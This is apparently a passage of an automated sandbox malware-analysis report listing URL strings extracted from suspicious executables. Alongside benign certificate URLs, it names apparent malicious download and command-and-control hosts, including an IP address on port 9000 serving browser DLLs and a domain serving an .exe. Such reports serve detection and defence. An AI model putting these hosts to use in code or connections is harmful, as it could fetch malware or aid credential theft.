Source: is-280SC.tmp.25.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabj
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2408107032.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2536998293.0000000002FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.aap
Source: WlCIinu0yp.exe, 00000000.00000003.1755200268.00000000041E4000.00000004.00000020.00020000.00000000.sdmp, lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000002.3123961585.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000000.1910706817.000000000040A000.00000008.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0?
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0Q
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000000.1911260864.0000000001229000.00000080.00000001.01000000.0000000C.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000F8D000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000000.1911260864.0000000001229000.00000080.00000001.01000000.0000000C.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000F8D000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000000.1911260864.0000000001229000.00000080.00000001.01000000.0000000C.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000F8D000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pofix.red/upd/index.php
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pofix.red/upd/index.php.exe
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pofix.red/upd/index.phpa6592c80f8124e769b4e8a07f7.exexe
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://qt-project.org/xml/features/report-whitespace-only-CharData
Source: is-280SC.tmp.25.dr	String found in binary or memory: http://qtav.org2
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C500179000.00000004.00000800.00020000.00000000.sdmp, ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C50003B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqw
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqw1b87bd06.$
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqwZ
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqwet
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqwetca
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqwtem32
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://t2.symcb.com0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://tl.symcd.com0&
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001C1000.00000004.00000800.00020000.00000000.sdmp, background.js.9.dr	String found in binary or memory: http://www.gzip.org/zlib/rfc-gzip.html
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000003.2001572551.0000000002108000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000000.2034256037.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000003.1942644653.0000000002330000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000002.3126939578.0000000002101000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000003.2053700608.00000000020D8000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000002.3127247795.0000000000765000.00000004.00000020.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000003.2053524562.0000000003120000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000002.3128579767.00000000020D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.mpegla.com
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000003.2001572551.0000000002108000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000000.2034256037.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000003.2001572551.0000000002108000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000000.2034256037.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: RegAsm.exe, 00000017.00000002.3215948987.000000001BD6D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3123015429.0000000000BFF000.00000002.00000001.01000000.00000010.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3123015429.0000000000BFF000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000606000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/7153le
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/9
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/A
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/B
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/I
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/Q
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/X
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/a
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/d6
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/freebl3.dll
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/freebl3.dllEdge
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/freebl3.dllo
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dll
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000528000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dllEdge
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dllc~
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dllq
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dllx
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/msvcp140.dll
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/msvcp140.dlldge
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/msvcp140.dlly
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/ng
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/nss3.dll
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/nss3.dllft
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/soft
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/softokn3.dll
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/softokn3.dll;
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/softokn3.dlldge
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/softokn3.dll~
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/sqlx.dll1
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/sqlx.dll;
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/t6
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll&
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll(
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll4
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dllUser
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll_7)
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dlle
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dllets
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dllpet
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000e7153le
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000ing
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000l
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000seelse
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000vcruntime140.dll_7)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe, 00000013.00000002.1955136682.0000000000315000.00000004.00000001.01000000.00000013.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://carthewasher.net/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C1E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1732890461.0000000004232000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1727787269.0000000004232000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724263292.0000000004226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://carthewasher.net/038bcf3a84a6c65c7cd47ac3b64b7f9b/cad54ba5b01423b1af8ec10ab5719d97.exe
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
